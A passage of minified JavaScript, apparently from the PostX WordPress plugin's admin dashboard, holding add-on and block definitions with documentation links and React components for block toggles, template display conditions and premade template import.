Addon.","ultimate-post"),img:"beaver.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/beaver-builder-addon/",video:"https://www.youtube.com/watch?v=aLfI0RkJO6g",position:20,integration:!0},ultp_frontend_submission:{name:"Front End Post Submission",desc:__("Registered/guest writers can submit posts from frontend. Admins can easily manage, review, and publish posts.","ultimate-post"),img:"frontend_submission.svg",docs:"https://wpxpo.com/docs/postx/add-on/front-end-post-submission/",live:"https://www.wpxpo.com/postx/front-end-post-submission/live_demo_args",video:"https://www.youtube.com/watch?v=KofF7BUwNC0",is_pro:!0,position:6,integration:!1},ultp_category:{name:"Taxonomy Image & Color",desc:__("It allows you to add category or taxonomy-specific featured images and colors to make them attractive.","ultimate-post"),is_pro:!0,docs:"https://wpxpo.com/docs/postx/add-on/category-addon/",live:"https://www.wpxpo.com/postx/taxonomy-image-and-color/live_demo_args",video:"https://www.youtube.com/watch?v=cd75q-lJIwg",img:"category-style.svg",position:15},ultp_progressbar:{name:"Progress Bar",desc:__("Display a visual indicator of the reading progression of blog posts and the scrolling progression of pages.","ultimate-post"),img:"progressbar.svg",docs:"https://wpxpo.com/docs/postx/add-on/progress-bar/",live:"https://www.wpxpo.com/postx/progress-bar/live_demo_args",video:"https://www.youtube.com/watch?v=QErQoDhWi4c",is_pro:!0,position:30},ultp_yoast:{name:"Yoast",desc:__("It allows you to display custom meta descriptions added with the Yoast SEO plugin instead of excerpts.","ultimate-post"),img:"yoast.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Yoast",slug:"wordpress-seo/wp-seo.php"},position:55,integration:!0},ultp_aioseo:{name:"All in One SEO",desc:__("It allows you to display custom meta descriptions added with the All in One SEO plugin instead of excerpts.","ultimate-post"),img:"aioseo.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"All in One SEO",slug:"all-in-one-seo-pack/all_in_one_seo_pack.php"},position:35,integration:!0},ultp_rankmath:{name:"Rank Math",desc:__("It allows you to display custom meta descriptions added with the Rank Math plugin instead of excerpts.","ultimate-post"),img:"rankmath.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Rank Math",slug:"seo-by-rank-math/rank-math.php"},position:40,integration:!0},ultp_seopress:{name:"SEOPress",desc:__("It allows you to display custom meta descriptions added with the SEOPress plugin instead of excerpts.","ultimate-post"),img:"seopress.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"SEOPress",slug:"wp-seopress/seopress.php"},position:45,integration:!0},ultp_squirrly:{name:"Squirrly",desc:__("It allows you to display custom meta descriptions added with the Squirrly plugin instead of excerpts.","ultimate-post"),img:"squirrly.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Squirrly",slug:"squirrly-seo/squirrly.php"},position:50,integration:!0},ultp_builder:{name:"Dynamic Site Builder",desc:__("The Gutenberg-based Builder allows users to create dynamic templates for Home and all Archive pages.","ultimate-post"),img:"builder-icon.svg",docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",live:"https://www.wpxpo.com/postx/gutenberg-site-builder/live_demo_args",video:"https://www.youtube.com/watch?v=0qQmnUqWcIg",is_pro:!1,position:5},ultp_chatgpt:{name:"ChatGPT",desc:__("PostX brings the ChatGPT into the WordPress Dashboard to let you generate content effortlessly.","ultimate-post"),img:"ChatGPT.svg",docs:"https://wpxpo.com/docs/postx/add-on/chatgpt-addon/",live:"https://www.wpxpo.com/postx-chatgpt-wordpress-ai-content-generator/live_demo_args",video:"https://www.youtube.com/watch?v=NE4BPw4OTAA",is_pro:!1,position:6}}},7191:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(1383),o=n(8949),i=n(356);n(563);const{__}=wp.i18n,l={grid:{label:__("Post Grid Blocks","ultimate-post"),attr:{post_grid_1:{label:__("Post Grid #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6829",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-1/",icon:"post-grid-1.svg"},post_grid_2:{label:__("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},post_grid_3:{label:__("Post Grid #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6831",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-3/",icon:"post-grid-3.svg"},post_grid_4:{label:__("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_grid_5:{label:__("Post Grid #5","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6833",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-5/",icon:"post-grid-5.svg"},post_grid_6:{label:__("Post Grid #6","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6834",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-6/",icon:"post-grid-6.svg"},post_grid_7:{label:__("Post Grid #7","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6835",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-7/",icon:"post-grid-7.svg"}}},list:{label:__("Post List Blocks","ultimate-post"),attr:{post_list_1:{label:__("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_list_2:{label:__("Post List #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6837",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-2/",icon:"post-list-2.svg"},post_list_3:{label:__("Post List #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6838",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-3/",icon:"post-list-3.svg"},post_list_4:{label:__("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"}}},slider:{label:__("Post Slider Blocks","ultimate-post"),attr:{post_slider_1:{label:__("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_slider_2:{label:__("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"}}},other:{label:__("Others PostX Blocks","ultimate-post"),attr:{menu:{label:__("Menu - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/introducing-postx-mega-menu/",docs:"https://wpxpo.com/docs/postx/postx-menu/",icon:"/menu/menu.svg"},post_module_1:{label:__("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_module_2:{label:__("Post Module #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6827",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-2/",icon:"post-module-2.svg"},heading:{label:__("Heading","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6842",docs:"https://wpxpo.com/docs/postx/all-blocks/heading-blocks/",icon:"heading.svg"},image:{label:__("Image","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6843",docs:"https://wpxpo.com/docs/postx/all-blocks/image-blocks/",icon:"image.svg"},taxonomy:{label:__("Taxonomy","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6841",docs:"https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/",icon:"ultp-taxonomy.svg"},wrapper:{label:__("Wrapper","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6844",docs:"https://wpxpo.com/docs/postx/all-blocks/wrapper/",icon:"wrapper.svg"},news_ticker:{label:__("News Ticker","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6845",docs:"https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/",icon:"news-ticker.svg"},advanced_list:{label:__("List - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7994",docs:"https://wpxpo.com/docs/postx/all-blocks/list-block/",icon:"advanced-list.svg"},button_group:{label:__("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"},row:{label:__("Row","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx-row-column-block/",docs:"https://wpxpo.com/docs/postx/postx-features/row-column/",icon:"row.svg"},advanced_search:{label:__("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},dark_light:{label:__("Dark Light","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},star_ratings:{label:__("Star Rating","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8858",icon:"star-rating.svg"},accordion:{label:__("Accordion","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8851",docs:"https://wpxpo.com/docs/postx/all-blocks/accordion-block/",icon:"accordion.svg"},tabs:{label:__("Tabs","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9045",docs:"https://wpxpo.com/docs/postx/all-blocks/tabs-block/",icon:"tabs.svg"},gallery:{label:__("PostX Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8951",docs:"https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/",icon:"gallery.svg"},youtube_gallery:{label:__("Youtube Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9096",docs:"https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/",icon:"youtube-gallery.svg"}}},builder:{label:__("Site Builder Blocks","ultimate-post"),attr:{builder_post_title:{label:__("Post Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_title.svg"},builder_advance_post_meta:{label:__("Advance Post Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_meta.svg"},builder_archive_title:{label:__("Archive Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"archive-title.svg"},builder_author_box:{label:__("Post Author Box","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author_box.svg"},builder_post_next_previous:{label:__("Post Next Previous","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/next_previous.svg"},builder_post_author_meta:{label:__("Post Author Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author.svg"},builder_post_breadcrumb:{label:__("Post Breadcrumb","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/breadcrumb.svg"},builder_post_category:{label:__("Post Category","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/category.svg"},builder_post_comment_count:{label:__("Post Comment Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comment_count.svg"},builder_post_comments:{label:__("Post Comments","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comments.svg"},builder_post_content:{label:__("Post Content","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/content.svg"},builder_post_date_meta:{label:__("Post Date Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_date.svg"},builder_post_excerpt:{label:__("Post Excerpt","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/excerpt.svg"},builder_post_featured_image:{label:__("Post Featured Image/Video","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/featured_img.svg"},builder_post_reading_time:{label:__("Post Reading Time","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/reading_time.svg"},builder_post_social_share:{label:__("Post Social Share","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/share.svg"},builder_post_tag:{label:__("Post Tag","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_tag.svg"},builder_post_view_count:{label:__("Post View Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/view_count.svg"}}}},s=()=>{const[e,t]=(0,a.useState)({}),[n,s]=(0,a.useState)({state:!1,status:""}),[p,c]=(0,a.useState)(!1),d=(0,r.t)();(0,a.useEffect)((()=>{u()}),[]);const u=()=>{c(!0),wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&d.current&&(t(e.settings),c(!1))}))};return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-container"},n.state&&(0,a.createElement)(i.Z,{delay:2e3,toastMessages:n,setToastMessages:s}),Object.keys(l).map(((n,r)=>{const i=l[n];return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-group",key:r},p?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:180,unit1:"px",size2:32,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Array(3).fill(1).map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:t},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:25,unit2:"px",br:4}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:100,unit1:"px",size2:20,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:46,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:36,unit1:"px",size2:20,unit2:"px",br:8}}))))))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_h5"},i.label),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Object.keys(i.attr).map(((n,r)=>{const o=i.attr[n];let l=!!o.default;return""==e[n]&&(l="yes"==e[n]),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:r},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/blocks/${o.icon}`,alt:o.label}),(0,a.createElement)("div",null,o.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},o.docs&&(0,a.createElement)("a",{href:o.docs+"?utm_source=db-postx-blocks&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-media-document"}),__("Docs","ultimate-post")),o.live&&(0,a.createElement)("a",{href:o.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-external"}),__("Live","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:n,checked:l,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&s({status:"success",messages:[e.message],state:!0})}))})(n)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:n})))})))))})))}},4872:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(1078),o=n(6765);const{__}=wp.i18n,i=e=>{const{id:t,type:n,settings:i,defaults:l,setShowCondition:s}=e,[p,c]=(0,a.useState)(t&&void 0!==i[n]&&void 0!==i[n][t]?i[n][t]:["include/"+n]),[d,u]=(0,a.useState)({reload:!1,dataSaved:!1});return(0,a.createElement)("div",{className:"ultp-modal-content"},(0,a.createElement)("div",{className:"ultp-condition-wrap"},(0,a.createElement)("div",{className:"ultp_h3"},__("Where Do You Want to Display Your Template?","ultimate-post")),(0,a.createElement)("p",{className:"ultp-description"},__("Set the conditions that determine where your Template is used throughout your site.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-condition-items"},p.map(((e,i)=>{if(e)return(0,a.createElement)("div",{key:i,className:"ultp-condition-wrap__field"},"header"==n||"footer"==n?(0,a.createElement)(r.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}):(0,a.createElement)(o.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}),(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-condition_cancel",onClick:()=>{u({dataSaved:!1});let e=JSON.parse(JSON.stringify(p));e.splice(i,1),c(e)}}))}))),(0,a.createElement)("button",{className:"btnCondition cursor",onClick:()=>{const e="singular"==n?"include/singular/post":"header"==n||"footer"==n?"include/"+n+"/entire_site":"include/"+n;c([...p,e])}},__("Add Conditions","ultimate-post"))),(0,a.createElement)("button",{className:"ultp-save-condition cursor",onClick:()=>{u({reload:!0});let e=Object.assign({},i);void 0!==e[n]||(e[n]={}),e[n][t]=p.filter((e=>e)),wp.apiFetch({path:"/ultp/v2/condition_save",method:"POST",data:{settings:e}}).then((e=>{e.success&&(u({reload:!1,dataSaved:!0}),setTimeout((function(){u({reload:!1,dataSaved:!1}),s&&s("")}),2e3))}))}},d.dataSaved?"Condition Saved.":"Save Condition",(0,a.createElement)("span",{style:{visibility:d.reload?"visible":"hidden"},className:"dashicons dashicons-update rotate ultp-builder-import"})))}},1078:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[4]?x(s[4],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[3];return t&&o[s[2]]&&o[s[2]].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s.splice(0,1,e.target.value),i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"entire_site",onChange:e=>{s.splice(2,1,e.target.value||"entire_site"),s.splice(3),"singular"==e.target.value&&s.push("post"),i(s.join("/"),l)}},o[r].map(((e,t)=>(0,a.createElement)("option",{key:t,value:e.value},e.label)))),s[2]&&"entire_site"!=s[2]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("select",{value:s[3]||"",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s.splice(3,1,e.target.value),s.splice(e.target.value?4:3);const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[s[2]]&&o[s[2]].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>!e.attr&&(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[4])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s.splice(4,1,"");const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s.splice(4,1,e.value),i(s.join("/"),l)}},e.title))))))))}},6765:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[3]?x(s[3],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[2];return t&&o[r]&&o[r].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s[0]=e.target.value,i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"post",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s[2]=e.target.value;const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[r]&&o[r].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[3])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s[3]="";const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s[3]=e.value,i(s.join("/"),l)}},e.title)))))))}},8351:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7462),r=n(7294),o=n(1383),i=n(4766),l=n(356),s=n(4482),p=n(8949),c=n(4872);n(3493);const{__}=wp.i18n,d=e=>{const t=e.has_ultp_condition?ultp_condition:ultp_dashboard_pannel,{notEditor:n}=e,d=["singular","archive","category","search","author","post_tag","date","header","footer","404"],[u,m]=(0,r.useState)(""),[f,h]=(0,r.useState)([]),[g,v]=(0,r.useState)("all"),[_,w]=(0,r.useState)(!1),[b,x]=(0,r.useState)([]),[y,k]=(0,r.useState)(n||""),[E,C]=(0,r.useState)([]),[S,M]=(0,r.useState)(!1),[L,N]=(0,r.useState)(""),[Z,P]=(0,r.useState)([]),[z,A]=(0,r.useState)(""),[B,H]=(0,r.useState)(!1),[T,R]=(0,r.useState)(!1),[O,j]=(0,r.useState)(!1),[V,F]=(0,r.useState)(""),[W,D]=(0,r.useState)(!1),I="yes"==n?wp.data.select("core/editor").getCurrentPostId():"",[U,$]=(0,r.useState)([]),[G,q]=(0,r.useState)(!1),[K,X]=(0,r.useState)({state:!1,status:""}),Q=(0,o.t)(),J=async()=>{await wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&e.data){const t=JSON.parse(e.data);Y(t)}}))},Y=e=>{const t=[],n=[];e.forEach((e=>{e.templates.forEach((a=>{const r={...a,parentID:e.ID};r.hasOwnProperty("home_page")&&"home_page"==r.home_page&&t.push(r),"ultp_builder"==r.type&&n.push(r)}))})),P(n),$(t)},ee=async()=>{await wp.apiFetch({path:"/ultp/v2/data_builder",method:"POST",data:{pid:I}}).then((e=>{e.success&&Q.current&&(h(e.postlist),x(e.settings),C(e.defaults),m(e.type),j(!0),J())}))};(0,r.useEffect)((()=>(ee(),document.addEventListener("mousedown",ne),()=>document.removeEventListener("mousedown",ne))),[]);const te=(e,t)=>{wp.apiFetch({path:"/ultp/v2/get_single_premade",method:"POST",data:{type:L,ID:e,apiEndPoint:t}}).then((e=>{e.success?(A(""),window.open(e?.link?.replaceAll("&amp;","&"))):(H(!0),A(""),R(!0))}))},ne=e=>{e.target&&!e.target.classList?.contains("ultp-reserve-button")&&(F(""),D(!1))},ae=(e,n)=>{const a=`https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name.toLowerCase().replaceAll(" ","_")}.jpg`,o="https://postxkit.wpxpo.com/"+(["header","footer","front_page"].includes(L)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type));return(0,r.createElement)("div",{key:n,className:"ultp-item-list ultp-premade-item"},(0,r.createElement)("div",{className:"listInfo"},(0,r.createElement)("div",{className:"title"},(0,r.createElement)("span",null,e.name),(0,r.createElement)("div",{className:"parent"},e.parent)),e.pro&&!t.active?(0,r.createElement)("a",{className:"ultp-upgrade-pro-btn",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):e.pro&&T?(0,r.createElement)("a",{className:"ultp-btn-success",target:"_blank",href:`https://www.wpxpo.com/postx/?utm_source=db-postx-builder&utm_medium=${L}-template&utm_campaign=postx-dashboard#pricing`,rel:"noreferrer"},__("Get License","ultimate-post")):(0,r.createElement)("span",{onClick:()=>{A(e.ID),te(e.ID,"https://postxkit.wpxpo.com/"+e.live)},className:"btnImport cursor"}," ",i.ZP.arrow_down_line,__("Import","ultimate-post"),z&&z==e.ID?(0,r.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")),(0,r.createElement)("div",{className:"listOverlay bg-image-aspect",style:{backgroundImage:`url(${a})`}},(0,r.createElement)("div",{className:"ultp-list-dark-overlay"},(0,r.createElement)("a",{className:"ultp-overlay-view 